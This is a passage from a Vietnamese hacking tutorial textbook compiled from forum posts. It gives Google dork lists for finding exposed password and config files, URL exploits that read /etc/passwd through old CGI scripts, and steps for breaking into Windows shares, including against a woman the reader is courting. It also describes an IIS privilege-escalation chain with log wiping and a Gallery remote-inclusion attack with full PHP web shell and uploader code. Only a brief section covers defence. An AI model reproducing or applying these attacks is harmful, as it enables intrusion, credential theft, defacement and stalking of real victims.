“allinurl:wwwboard/passwd.txt”(không có ngoặc kép) trong Google search sẽ liệt kê tất cả các liên kết đến server mà dễ bị tấn công vào “tính dễ bị  tấn công mật khẩu WWWBoard”. Để biết thêm về tính dễ bị tấn công này bạn có thể vào link sau đây: c. Sử dụng “inurl:.bash_history” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến  server mà cho phép truy cập vào file “.bash_history” qua web. Đây là một file lịch sử dòng lệnh. File này bao gồm danh sách  các lệnh được thực thi bởi quản trị viên, , và đôi khi bao gồm cả thông tin nhạy cảm như mật khẩu gõ vào bởi quản trị viên. Nếu file này bị làm hại và nếu nó bao gồm mật khẩu đa mã hóa của hệ thống unix (or *nix) thì nó có thể dễ dàng bị ##### bởi phương pháp “John The Ripper”. d. Sử dụng “inurl:config.txt” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến các  máy chủ cho phép truy cập vào file “config.txt” qua giao diện web. File này bao gồm các thông tin nhạy cảm, bao gồm giá trị bị băm ra của mật khẩu quản trị và sự xác thực quyền truy cập cơ sở dữ  liệu. Ví dụ: Hệ thống quản lý học tập Ingenium là một ứng dụng Web cho các hệ thống Windows phát triển bởi Click2learn, Inc. Hệ thống  quản lý học tập Ingenium phiên bản 5.1 và 6.1 lưu các thông tin nhạy cảm không an tòan trong file config.txt. Để biết  thêm thông tin vào liên kết sau: Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 49 Giáo trình hack Những tìm kiếm tương tự khác dùng “inurl:” hoặc “allinurl:” kết hợp với các cú pháp khác: inurl:admin filetype:txt inurl:admin filetype:db inurl:admin filetype:cfg inurl:mysql filetype:cfg inurl asswd filetype:txt inurl:iisadmin inurl:auth_user_file.txt inurl:#####s.txt inurl:"wwwroot/*." inurl:adpassword.txt inurl:webeditor.php inurl:file_upload.php inurl:gov filetype:xls "restricted" index of ftp +.mdb allinurl:/cgi­bin/ +mailto Tìm kiếm các site hoặc server dễ bị tấn công dùng “intitle:” hoặc “allintitle:” a. Sử dụng [allintitle: "index of /root”] (không có ngoặc vuông) sẽ liệt kê các liên kết đến  các webserver(máy chủ Web) cho phép truy cập vào các thư mục giới hạn như “root” qua giao  diện web. Thư mục này đôi khi bao gồm các thông tin nhạy cảm mà có thể dễ dàng tìm được tqua những  yêu cầu Web đơn giản. b. Sử dụng [allintitle: "index of /admin”] (không có ngoặc vuông) sẽ liệt kê các liên kết đến  các website cho phép duyệt chỉ mục các thư mục giới hạn như “admin” qua giao diện web. Hầu hết  các ứng dụng web đôi khi sử dụng tên như “admin” để lưu quyền admin trong đó. Thư mục này đôi khi bao  hàm các thông tin nhạy cảm mà có thể dễ dàng tìm được qua các yêu cầu Web đơn giản. Những tìm kiếm tương tự dùng “intitle:” hoặc “allintitle:” kết hợp với các cú pháp khác intitle:"Index of" .sh_history intitle:"Index of" .bash_history Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 50 Giáo trình hack intitle:"index of" passwd intitle:"index of" people.lst intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" spwd intitle:"index of" master.passwd intitle:"index of" htpasswd intitle:"index of" members OR accounts intitle:"index of" user_carts OR user_cart allintitle: sensitive filetype:doc allintitle: restricted filetype :mail allintitle: restricted filetype:doc site:gov Những truy vấn tìm kiếm thú vị khác Để tìm những site dễ bị tấn công bằng phương pháp Cross­Sites Scripting (XSS): allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php allinurl:/phpinfo.php Để tìm những site dễ bị tấn công bằng phương pháp SQL Injection: allinurl:/privmsg.php allinurl:/privmsg.php Bảo mật các server hoặc site khỏi sự tấn công của Google Dưới đây là những phương pháp bảo mật mà các quản trị viên và các chuyên gia bảo mật  phải đưa vào tài khoản để bảo mật những thông tin then chốt khỏi rơi vào không đúng chỗ: ­ Cài những bản vá bảo mật mới nhất cho các ứng dụng cũng như hệ điều hành chạy trên  máy chủ. Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 51 Giáo trình hack ­ Đừng để những thông tin nhạy cảm và then chốt trên máy chủ mà không có hệ thống  xác nhận hợp lệ mà có thể bị truy cập trực tiếp bởi bất kỳ ai trên internet. ­ Không cho phép duyệt thư mục trên webserver. Duyệt thư mục chỉ nên được cho phép  với các thư mục web bạn muốn cho bất kỳ ai trên internet truy cập. ­ Nếu bạn tìm thấy bất kỳ liên kết nào đến server hoặc site giới hạn của bạn trong kết quả  của Google search thì nó phải được xóa đi. Vào liên kết sau để biết thêm chi tiết: ­ Không cho phép truy cập dấu tên vào webserver qua internet vào các thư mục hệ thống giới hạn. ­ Cài các công cụ lọc như URLScan cho các máy chủ chạy IIS như là webserver. Kết luận Đôi khi tăng sự phức tạp trong hệ thống tạo ra những sự cố mới. Google trở lên phức tạp  hơn có thể được sử dụng bởi bất kỳ anh Tom, anh Dick & Harry nào đó trên internet để đào bới những thông tin nhạy cảm mà thông  thường không thể nhìn thấy hoặc với đến bởi bất kỳ ai. Người ta không thể ngăn cản ai đó ngừng tạo ra những giả mạo vì vậy những lựa chọn  duy nhất còn lại cho những chuyên gia bảo mật và quản trị hệ thống là bảo vệ hệ thống của họ và làm khó  khăn hơn từ sự xâm hại không mong muốn. Về tác giả Không có nhiều điều để tôi có thể nói về chính tôi. Nói một cách ngắn gọn, Tôi dành hầu  hết thời gian để nghiên cứu về sự dễ bị tấn công, một tách càfê và internet. Đó là tất cả về tôi. Để biết thêm về tôi xin mời vào www.hackingspirits.com D ebasis Mohanty www.hackingspirits.com Email: debasis_mty@yahoo.com Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 52 Giáo trình hack Bạn có thể thấy tôi tại: ­of­Fire Nhận xét và góp ý xin gửi cho debasis_mty@yahoo.com. 24 . ) Cách hack Web cơ bản nhất thông qua CGI script : _ Lỗi thứ 1 : lỗi nph­test­cgi + Đánh tên trang Web bị lỗi vào trong trình duyệt của bạn . + Đánh dòng sau vào cuốI cùng : /cgi­bin/nph­test­cgi + Lúc đó trên URL bạn sẽ nhìn giống như thế này : Code: ­bin/nph­test­cg%20i + Nếu thành công bạn sẽ thấy các thư mục được cất bên trong . Để xem thư mục nào bạn đánh tiếp : CODE ? /* + file chứa passwd thường được cất trong thư mục /etc , bạn hãy đánh trên URL dòng sau : Code: ­bin/nph­test­cg%20i?/etc/* _ Lỗi thứ 2 : lỗi php.cgi + Tương tự trên bạn chỉ cần đánh trên URL dòng sau để lấy pass : Code: ­bin/php.cgi?/et c/passwd Quan trọng là đây là những lỗi đa cũ nên việc tìm các trang Web để các bạn thực hành rất khó , các bạn hãy vào trang google.com rồi đánh từ khoá : /cgi­bin/php.cgi?/etc/passwd] hoặc cgi­bin/nph­test­cgi?/etc Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 53 Giáo trình hack sau đó các bạn hãy tìm trên đó xem thử trang nào chưa fix lỗi để thực hành nhé . 25 . ) Kỹ thuật xâm nhập máy tính đang online : _ Xâm nhập máy tính đang online là một kỹ thuật vừa dễ lạI vừa khó . Bạn có thể nói dễ  khi bạn sử dụng công cụ ENT 3 nhưng bạn sẽ gặp vấn đề khi dùng nó là tốc độ sử dụng trên máy của nạn  nhân sẽ bị chậm đi một cách đáng kể và những máy họ không share thì không thể xâm nhập được, do đó nếu họ tắt máy là mình sẽ bị công cốc khi chưa kịp  chôm account , có một cách êm thấm hơn , ít làm giảm tốc độ hơn và có thể xâm nhập khi nạn nhân không  share là dùng chương trình DOS để tấn công . Ok , ta sẽ bắt đầu : _ Dùng chương trình scan IP như ENT 3 để scan IP mục tiêu . _ Vào Start == > Run gõ lệnh cmd . _ Trong cửa sổ DOS hãy đánh lệnh “net view ” CODE + VD : c:\net view 203.162.30.xx _ Bạn hãy nhìn kết quả , nếu nó có share thì dễ quá , bạn chỉ cần đánh tiếp lệnh net use  <ổ đĩa bất kỳ trên máy của bạn > :  + VD : c:\net use E : 203.162.30.xxC _ Nếu khi kết nối máy nạn nhân mà có yêu cầu sử dụng Passwd thì bạn hãy download  chương trình dò passwd về sử dụng ( theo tôi bạn hãy load chương trình “pqwak2” áp dụng cho việc dò  passwd trên máy sử dụng HĐH Win98 hoặc Winme và chương trình “xIntruder” dùng cho Win NT ) . Chú ý là về cách sử dụng thì hai chương trình tương tự  nhau , dòng đầu ta đánh IP của nạn nhân , dòng thứ hai ta đánh tên ổ đĩa share của nạn nhân nhưng đối  với “xIntruder” ta chú ý chỉnh Delay của nó cho hợp lý , trong mạng LAN thì Delay của nó là 100 còn trong mạng Internet là trên dướI 5000 . _ Nếu máy của nạn nhân không có share thì ta đánh lệnh : net use  : c$ (hoặc d$)``administrator`` (còn tiếp) ....... + VD : net use E : 203.162.30.xxC$``administrator`` Kiểu chia sẽ bằng c$ là mặc định đối với tất cả các máy USER là ``administrator`` . _ Chúng ta có thể áp dụng cách này để đột nhập vào máy của cô bạn mà mình “thầm  thương trộm nhớ” để tìm những dữ liệu liên quan đến địa chỉ của cô nàng ( với điều kiện là cô ta đang dùng máy ở nhà và bạn may mắn khi tìm được địa chỉ đó ) . Bạn chỉ cần  chat Y!Mass rồi vào DOS đánh lệnh : c:\netstat –n Khi dùng cách này bạn hãy tắt hết các cửa sổ khác chỉ để khung chat Y!Mass với cô ta  thôi , nó sẽ giúp bạn dễ dàng hơn trong việc xác định địa chỉ IP của cô ta . Sau đó bạn dùng cách xâm nhập mà tôi đa nói ở trên .( Có lẽ anh chàng tykhung của chúng ta hồi xưa  khi tán tỉnh cô Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 54 Giáo trình hack bạn ở xa qua mạng cũng dùng cách này để đột nhập và tìm hiểu địa chỉ của cô ta đây mà , hi`hi` . ) Bạn sẽ thành công nếu máy của nạn nhân không cài firewall hay proxy . =================================================== = Nhiều bạn có yêu cầu tôi đưa ra địa chỉ chính xác cho các bạn thực tập , nhưng tôi không  thể đưa ra được vì rút kinh nghiệm những bài hướng dẫn có địa chỉ chính xác , khi các bạn thực hành xong đoạt được quyền admin có bạn đa xoá cái database của họ . Như vậy HVA sẽ mang tiếng là nơi bắt nguồn cho sự phá hoại trên mạng . mong các bạn thông  cảm , nếu có thể thì tôi chỉ nêu những cách thức để các bạn tìm những dịa chỉ bị lỗi đó chứ không đưa ra địa  chỉ cụ thể nào . =================================================== = Ở phần 4 tôi sẽ đề cập đến kỹ thuật chống xâm nhập vào máy tính của mình khi bạn  online , tìm hiểu sơ các bước khi ta quyết định hack một trang Web , kỹ thuật tìm ra lỗi trang Web để thực  hành , kỹ thuật hack Web thông qua lỗi Gallery.v.v……. 19 . ) Kỹ thuật xâm nhập Window NT từ mạng Internet : _ Đây là bài học hack đầu tiên mà tôi thực hành khi bắt đầu nghiên cứu về hack , bây giờ tôi sẽ bày lại cho các bạn . bạn sẽ cần phảI có một số thờI gian đểthực hiện được nó vì nó  tuy dễ nhưng khó . Ta sẽ bắt đầu : _ Đầu tiên bạn cần tìm một server chạy IIS : _ Tiếp đến bạn vào DOS và đánh ` FTP `. VD : Code: c:\Ftp  ( trang naỳ khi tôi thực hành thì vẫn còn làm được , bây giờ không biết họ đa fix chưa , nếu bạn nào có trang nào khác thì hãy post lên cho mọI ngườI cùng làm nhé ) Nếu  connect thành công , bạn sẽ thấy một số dòng tương tự như thế này : CODE Connected to  220 Vdodgy Microsoft FTP Service (Version 3.0). User Code: (www.dodgyinc.com:(none)): Cái mà ta thấy ở trên có chứa những thông tin rất quan trọng , nó cho ta biết tên Netbios của máy tính là “ Vdodgy ” . Từ điều này bạn có thể suy diễn ra tên mà được sử dụng cho NT để cho phép ta có thể khai thác , mặc định mà dịch vụ FTP gán cho nó nếu nó chưa  đổi tên sẽ là “IUSR_VDODGY” . Hãy nhớ lấy vì nó sẽ có ích cho ta . Nhập ``anonymous” trong user nó sẽ xuất hiện dòng sau : Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 55 Giáo trình hack CODE 331 Anonymous access allowed, send identity (e­mail name) as password. Password: Bây giờ passwd sẽ là bất cứ gì mà ta chưa biết , tuy nhiên , bạn hãy thử đánh vào passwd là “anonymous” . Nếu nó sai , bạn hãy log in lạI thiết bị FTP , bạn hãy nhớ là khi ta quay lạI lần này thì không sử dụng cách mạo danh nữa ( anonymous ) mà sử dụng “`Guest” ,  thử lại passwd với “guest” xem thế nào . Bây giờ bạn hãy đánh lệnh trong DOS : CODE Cd /c Và sẽ nhìn thấy kết quả nếu như bạn đa xâm nhập thành công , bây giờ bạn hãy nhanh  chóng tìm thư mục `cgi­bin` . Nếu như bạn may mắn , bạn sẽ tìm được dễ dàng vì thông thường hệ  thống quản lý đa đặt `cgi­bin` vào nơi mà ta vừa xâm nhập để cho các ngườI quản lý họ dễ dàng điều khiển  mạng hơn . thư mục cgi­bin có thể chứa các chương trình mà bạn có thể lợi dụng nó để chạy từ trình  duyệt Web của bạn . Ta hãy bắt đầu “quậy” nào greenbiggrin.gif greenbiggrin.gif . _ Đầu tiên , bạn hãy chuyển tớ thư mục cgi­bin và sử dụng lệnh “Binary” ( có thể các bạn  không cần dùng lệnh này ) , sau đó bạn dánh tiếp lệnh “put cmd.exe” . Tiếp theo là bạn cần có file hack để cài vào thư mục này , hãy tìm trên mạng để lấy 2 file quan trọng nhất đó là `getadmin.exe` và `gasys.dll` . Download chúng xuống , một khi bạn đa có nó hãy  cài vào trong thư mục cgi­bin . Ok , coi như mọI việc đa xong , bạn hãy đóng cửa sổ DOS . Bây giờ bạn hãy đánh địa chỉ sau lên trình duyệt của bạn : Code: ­bin/getadmin.exe? IUSR_VDODGY Sau vài giây bạn sẽ có được câu trả lời như ở dướI đây : CODE CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Congratulations , now account IUSR_VDODGY have administrator rights! Thế là bạn đa mạo danh admin để xâm nhập hệ thống , việc cần thiết bây giờ là bạn hãy tự tạo cho mình một account , hãy đánh dòng sau trên IE : Code: ­ Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 56 Giáo trình hack bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%2 0hacker%20toilahacker%20/add dòng lệnh trên sẽ tạo cho bạn một account login với user : anhdenday và passwd : toilahackerBây giờ bạn hãy là cho user này có account của admin , bạn chỉ cần đánh lên IE lệnh : Code: ­bin/getadmin.exe? anhdenday Vậy là xong rùi đó , bạn hãy disconnect và đến start menu ­ > find rồi search computer `www.dodgyinc.com`. Khi tìm thấy , bạn vào explore , explore NT sẽ mở ra bạn hay nhập  user và passwd để mở nó ( của tôi là user : anhdenday và passwd : toilahacker ) . Có một vấn đề là khi bạn xâm nhập hệ thống này thì sẽ bị ghi lại , do đó để xoá dấu vết  bạn hãy vào `Winnt\system32\logfiles` mở file log đó rồI xoá những thông tin liên quan đến bạn , rồI  save chúng . Nếu bạn muốn lấy một thông báo gì về việc chia sẽ sự xâm nhập thì bạn hãy thay đổi ngày tháng trên máy tính vớI URL sau : Code: ­bin/cmd.exe?/c%20 date%2030/04/03 xong rồI bạn hãy xoá file `getadmin.exe`, và `gasys.dll` từ `cgi­bin` . Mục đích khi ta xâm nhập hệ thống này là “chôm” pass của admin để lần sau xâm nhập một cách hợp lệ , do đó bạn hãy tìm file SAM ( chứa pass của admin và member ) trong hệ thống rồI dùng  chương trình “l0pht #####” để ##### pass ( Hướng dẫn về cách sử dụng “l0pht ##### v 3.02” tôi đa post lên rồi ,các bạn hãy tự nghiên cứu nhé ) . Đây là link : Code:  &s= Khi ##### xong các bạn đa có user và pass của admin rồI , bây giờ hãy xoá account của user ( của tôi là “anhdenday” ) đi cho an toàn . Bạn đa có thể làm gì trong hệ thống là tuỳ  thích , nhưng các bạn đừng xoá hết tài liệu của họ nhé , tội cho họ lắm . Bạn cảm thấy thế nào , rắc rối lắm phải không . Lúc tôi thử hack cách này , tôi đa mày mò  mất cả 4 giờ , nếu như bạn đa quen thì lần thứ 2 bạn sẽ mất ít thờI gian hơn . Ở phần 3 tôi sẽ đề cập đến HĐH Linux , đến cách ngắt mật khẩu bảo vệ của một Web  site , và làm thế nào để hack một trang web đơn giản nhất .v.v… 29 . ) Cách tìm các Website bị lỗi : _ Chắc các bạn biết đến các trang Web chuyên dùng để tìm kiếm thông tin trên mạng chứ ? Nhưng các bạn chắc cũng không ngờ là ta có thể dùng những trang đó để tìm những  trang Web bị lỗi ( Tôi vẫn thường dùng trang google.com và khuyên các bạn cũng nên dùng trang này vì  nó rất mạnh và hiệu quả ) . _ Các bạn quan tâm đến lỗi trang Web và muốn tìm chúng bạn chỉ cần vào google.com và đánh đoạn lỗi đó vào sau “allinurl : ” . VD ta có đoạn mã lỗi trang Web sau : Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 57 Giáo trình hack cgi­bin/php.cgi?/etc/passwd các bạn sẽ đánh : “allinurl:cgi­bin/php.cgi?/etc/passwd” Nó sẽ liệt kê ra những trang Web đang bị lỗi này cho các bạn , các bạn hãy nhìn xuống  dưới cùng của mỗi mẫu liệt kê ( dòng địa chỉ màu xanh lá cây ) nếu dòng nào viết y chang từ khoá mình nhập vào thì trang đó đa hoặc đang bị lỗi .Các bạn có xâm nhập vào  được hay không thì cũng còn tuỳ vào trang Web đó đa fix lỗi này hay chưa nữa . _ Các bạn quan tâm đến lỗi forum , các bạn muốn tìm forum dạng này để thực tập , chỉ  cần nhập từ khoá powered by VD sau là để tìm forum dùng Snitz 2000 : powered by Snitz 2000 _ Tuy nhiên , việc tìm ra đúng forum hoặc trang Web bị lỗi theo cách đó có xác suất  không cao , bạn hãy quan tâm đến đoạn string đặc biệt trong URL đặc trưng cho từng kiểu trang Web hoặc  forum đó ( cái này rất quan trọng , các bạn hãy tự mình tìm hiểu thêm nhé ) . VD tìm với lỗi Hosting Controller  thì ta sẽ có đoạn đặc trưng sau ``/admin hay /advadmin hay /hosting`` ta hãy đánh từ khoá : allinurl:/advadmin hoặc allinurl:/admin hoặc allinurl:/hosting Nó sẽ liệt kê ra các trang Web có URL dạng : _ hoặc _ hoặc _ VD với forum UBB có đoạn đặc trưng ``cgi­bin/ultimatebb.cgi?`` Ta cũng tìm tương tự như trên . Chỉ cần bạn biết cách tìm như vậy rồi thì sau này chỉ cần theo dõi thông tin cập nhật bên trang “Lỗi bảo mật” của HVA do bạn LeonHart post hằng ngày các bạn sẽ hiểu được ý  nghĩa của chúng và tự mình kiểm tra . 30 . ) Kỹ thuật hack Web thông qua lỗi Gallery ( một dạng của lỗi php code inject ): _ Gallery là một công cụ cho phép tạo một gallery ảnh trên web được viết bằng PHP , lợi  dụng sơ hở này ta có thể lợi dụng để viết thêm vào đó một mã PHP cho phép ta upload , đó chính là mục đích chính của ta . _ Trước hết bạn hãy đăng ký một host miễn phí , tốt nhất là bạn đăng ký ở brinkster.com  cho dễ . Sau đó bạn mở notepad và tạo file PHP với đoạn mã sau : CODE Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 58 Giáo trình hack <?php global $PHP_SELF; echo `` ``; set_magic_quotes_runtime(1); if ($act == ``shell``) { echo ``\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ``; system($shell); echo `` \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n``; } echo `` ``; ? > Đoạn mã này bạn hãy tạo làm 2 file có tên khác nhau ( nhưng cùng chung một mã ) và đặt  tên là : + shellphp.php : file này dùng để chạy shell trên victim host . + init.php : file này dùng để upload lên trang có host bạn vừa tạo . ( Bạn hãy upload file  init.php này lên sớm vì ta sẽ còn sử dụng nó nhưng với đoạn mã khác , bạn quên upload file này lên là tiêu  ) Bạn hãy tạo thêm một file PHP với mã sau : CODE <?php function handleupload() { if (is_uploaded_file($_FILES[`userfile`][`tmp_name`])) { $filename = $_FILES[`userfile`][`tmp_name`]; print ``$filename was uploaded successfuly``; $realname = $_FILES[`userfile`][`name`]; print ``realname is $realname\n``; print ``copying file to uploads dir ``.$realname; copy($_FILES[`userfile`][`tmp_name`],*PATH*.$realna me); // lưu ý *PATH* chúng ta sẽ thay đổi sau } else { echo ``Possible file upload attack: filename``.$_FILES[`userfile`][`name`].``.``; }} if ($act == ``upload``) { handleupload(); } echo `` <form ENCTYPE=multipart/form­data method=post action=$PHP_SELF? $QUERY_STRING > File: ``; ? > Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 59 Giáo trình hack Bạn hãy đặt tên là upload.php , nó sẽ dùng để upload lên trang Web của nạn nhân . _ Tiếp theo Bạn vào Google, gõ ``Powered by gallery`` rồi enter, Google sẽ liệt kê một đống những site sử dụng Gallery , bạn hãy chọn lấy một trang bất kỳ rồI dùng link sau để  thử xem nó còn mắc lỗI Gallery hay không : http:// trang Web của nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR= wxx.brinkster.com/ / Nếu bạn thấy hiện lên một ô hình chữ nhật ở phía trên cùng , bên phải của nó là ô lệnh  chuyển tiếp có chữ “Go” là coi như bạn đa tìm thấy được đốI tượng rồi đó . Bây giờ bạn đa có thể gõ lệnh thông qua ô chữ nhật đó để hack Web của nạn nhân . Trước hết bạn hãy gõ lệnh “pwd” để xác định đường dẫn tuyệt đối đến thư mục hiện thời  rồi nhấn nút “Go” , khi nó cho kết quả bạn hãy nhanh chóng ghi lại đường dẫn ở phía dướI ( Tôi sẽ sử dụng VD đường dẫn tôi tìm thấy là “/home/abc/xyz/gallery” ). Sau đó bạn đánh tiếp lệnh “|s –a|” để liệt kê các thư mục con của nó . Bây giờ bạn hãy nhìn kết quả , bạn sẽ thấy một đống các thư mục con mà ta đa liệt kê . Bạn hãy luôn nhớ là mục đích của chúng ta là tìm một thư mục có thể dùng để upload file upload.php mà ta đa chuẩn bị từ trước do đó bạn hãy xác định cùng tôi bằng cách nhìn vào những chữ cuốI cùng của mỗi hàng kết quả : + Bạn hãy loại bỏ trường hợp các thư mục mà có dấu “.” hoặc “..” vì đây là thư mục gốc  hoặc là thư mục ảo ( Nó thường được xếp trên cùng của các hàng kết quả ) . + Bạn cũng loạI bỏ những hàng có chữ cuối cùng có gắn đuôi ( VD như config.php , check.inc .v.v… ) vì đây là những file chứ không phải là thư mục . + Còn lại là những thư mục có thể upload nhưng tôi khuyên bạn nên chọn những hàng  chứa tên thư mục mà có chứa số lớn hơn 1 ( Bạn có thể xác định được chúng bằng cách nhìn cột thứ 2 từ  trái sang ) , vì như vậy vừa chắc chắn đây là thư mục không phải thư mục ảo , vừa làm cho admin của trang Web đó khó phát hiện khi ta cài file của ta vào . Tôi VD tôi phát hiện ra thư mục “loveyou” có chứa 12 file có thể cho ta upload , như vậy  đường dẫn chính thức mà ta upload lên sẽ là : /home/abc/xyz/Gallery/loveyou Bây giờ bạn hãy vào account host của bạn, sửa nội dung file init.php giống như mã của file  upload.php, nhưng sửa lại *PATH* thành “/home/abc/xyz/gallery/loveyou/ ”. Đồng thời cũng chuẩn bị một file upload.php trên máy của bạn với *PATH* là “” ( 2 dấu ngoặc  kép ). Bây giờ là ta đa có thể upload file upload.php lên trang Web của nạn nhân được rồi , bạn  hãy nhập địa chỉ sau trên trình duyệt Web của bạn : http:// trang Web của nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR= wxx.brinkster.com/ / Bạn sẽ thấy xuất hiện tiếp một khung hình chữ nhật và bên cạnh là có 2 nút lệnh , một là  nút “brown” , một là nút “upload” . Nút “brown” bạn dùng để dẫn đến địa chỉ file upload.php bạn đa  chuẩn bị trên máy của bạn , nút “upload” khi bạn nhấn vào đó thì nó sẽ upload file upload.php lên trang Web của nạn nhân . Ok , bây giờ coi như bạn đa hoàn  thành chặng đường hack Web rồi đó . Từ bây giờ bạn hãy vận dụng để tấn công đối thủ Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 60 Giáo trình hack như lấy database , password ( làm tương tự như các bài hướng dẫn hack trước ) , nhưng  các bạn chỉ nên thực tập chứ đừng xoá database hay phá Web của họ. Nếu là một hacker chân chính các  bạn chỉ cần upload lên trang Web dòng chữ : “Hack by ……..” là đủ rồi . Cũng như những lần trước ,  các bạn có thành công hay không cũng tuỳ thuộc vào sự may mắn và kiên trì nghiên cứu vận dụng kiến thức của các bạn . ( Dựa theo hướng dẫn hack của huynh vnofear – viethacker.net ) Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 61 Hacker làm gì để hack 1 trang Web : Giống Như Học Sinh Bùi Minh Trí.......Tấn Cống Vào Web Bộ Giáo Dục Và  Đạo Tạo....  Các bug , vulnerability ... đã được công bố trên toàn cầu nhưng chưa chắc site đã patch . Hãy thử những bug  mới nhất của công nghệ đang dùng của site đó .   Admin không phải lúc nào cũng cẩn thận , đôi khi họ sai lầm . Và tôi đúc kết những điều sau :   CHMOD : nhiều khi file config của forum không được CHMOD và dẫn đến dễ dàng xem được nó . Thông  thường đối với 1 số site bảo mật kém thì password của MYSQL thường trùng với pass của FTP Account . Ta dễ  dàng deface .  TROJAN , KEYLOGGER : 1 công cụ khá đơn giản nhưng hiệu nghiệm , nếu admin sơ xuất disable NAV thì  thứ này sẽ giúp ta có những info đặc biệt quan trọng về máy chủ .   Password default : Thứ dễ dàng này đôi khi rất hiệu nghiệm . Admin mới setup xong server . Và sơ ý chưa  change password default hoặc biết nhưng không đổi là điều kiện cho bạn attack hay deface .   ANON FTP : Bài này anh chàng hướng dẫn khá cụ thể . Tôi xin nói vấn tắt . 1 số server cho đăng nhập FTP  nặc danh . Tức là user " khách " . 1 số site cho phép user guest hay anon này upload hay download . Hãy tận dụng  .  Tôi đã điểm qua sơ lược 1 vài kinh nghiệm của tôi . Hy vọng các bạn sẽ áp dụng được trong thực tế và sáng tạo  những cách hay hơn ...

Các file đính kèm theo tài liệu này:

  • pdfGiáo trình hack.pdf
Tài liệu liên quan